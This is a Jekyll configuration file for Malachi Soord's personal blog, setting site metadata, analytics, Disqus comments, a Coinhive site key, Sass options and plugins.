# Permalinks
permalink:           pretty

# Setup
title:               Malachi Soord
tagline:             In a beautiful place out in the country
url:                 http://malachisoord.com
paginate:            5
baseurl:             ""
analytics_id:        UA-15939659-3
coin_hive_id:        A3ARHhxvDXwPWfRelWHtqRy87rFut1yT
disqus:              malachisoord
# Assets
sass:
  sass_dir:          _sass
  style:            :compressed

# About/contact
author:
  name:              Malachi Soord
  url:               http://malachisoord.com
  email:             me@malachisoord.com

# Gems
plugins:
  - jekyll-paginate
  - jekyll-gist
  - jekyll-seo-tag
  - jekyll-sitemap
  - jekyll-feed
